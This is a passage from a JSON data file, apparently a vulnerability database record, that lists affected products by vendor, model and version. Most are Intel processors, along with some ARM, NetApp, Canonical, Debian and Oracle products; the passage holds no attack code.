        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2608l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v4"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138t"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1800"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670k"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3858"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3680"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430um"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699r_v4"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5630"
      },
      {
        "_id": null,
        "model": "xeon e5 2609",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570k"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200h"
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "73"
      },
      {
        "_id": null,
        "model": "xeon e5 2450l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4558u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v4"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570s"
      },
      {
        "_id": null,
        "model": "xeon e5 2643 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4578u"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3160"
      },
      {
        "_id": null,
        "model": "xeon e5 2628l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2637 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620le"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3426"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3667u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v3"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660ue"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "460m"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2715qe"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570r"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3555le"
      },
      {
        "_id": null,
        "model": "xeon e3 1240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1268l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7545"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8100"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "530"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867l"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4410e"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2738"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3815"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.04"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "580m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v2"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5645"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5530"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5647"
      },
      {
        "_id": null,
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "17"
      },
      {
        "_id": null,
        "model": "xeon e3 1245 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "390m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v4"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6157u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550s"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3580"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4720hq"
      },
      {
        "_id": null,
        "model": "xeon e3 1280",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "450m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "720qm"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350u"
      },
      {
        "_id": null,
        "model": "xeon e5 2609 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2650l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440"
      },
      {
        "_id": null,
        "model": "xeon e5 2418l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "840qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2635qm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5502"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "550"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4900mq"
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v2"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v4"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120t"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134m"
      },
      {
        "_id": null,
        "model": "xeon e3 1286 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1565l_v5"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3235rk"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2510e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7920hq"
      },
      {
        "_id": null,
        "model": "xeon e5 2420 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100h"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5670"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4960hq"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3230rk"
      },
      {
        "_id": null,
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2758"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6150"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160f"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2718"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5560"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850hq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540m"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5287u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702mq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v2"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2650l_v4"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2348m"
      },
      {
        "_id": null,
        "model": "xeon e3 1285l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4278u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400t"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140m"
      },
      {
        "_id": null,
        "model": "atom x5-e3930",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6154"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430m"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "_id": null,
        "model": "xeon e5 2650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2623 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1575m_v5"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770te"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "965"
      },
      {
        "_id": null,
        "model": "xeon e5 2630l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210f"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2920xm"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3010"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3060"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5600u"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2560"
      },
      {
        "_id": null,
        "model": "xeon e3 1501l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300hq"
      },
      {
        "_id": null,
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.2.6"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v4"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5950hq"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8168"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3355"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699a_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5580"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v3"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3708"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2610ue"
      },
      {
        "_id": null,
        "model": "xeon e5 1660 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v2"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870s"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 1630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2657m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3338"
      },
      {
        "_id": null,
        "model": "xeon e5 2428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10c"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3710"
      },
      {
        "_id": null,
        "model": "xeon e5 2650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5750hq"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v3"
      },
      {
        "_id": null,
        "model": "xeon e5 2408l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2125"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y51"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5518"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7530"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620um"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2655le"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "960"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5539"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5677"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2430l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3510"
      },
      {
        "_id": null,
        "model": "xeon e5 2603 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570te"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340m"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3830"
      },
      {
        "_id": null,
        "model": "xeon e5 2640 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200u"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8153"
      },
      {
        "_id": null,
        "model": "xeon e5 2628l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2630qm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7540"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2538"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5603"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "610e"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350k"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2730"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700ec"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100m"
      },
      {
        "_id": null,
        "model": "core m7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y75"
      },
      {
        "_id": null,
        "model": "xeon e3 1241 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qe"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230f"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585l_v5"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3295rk"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3200rk"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5200u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2710qe"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "470um"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120me"
      },
      {
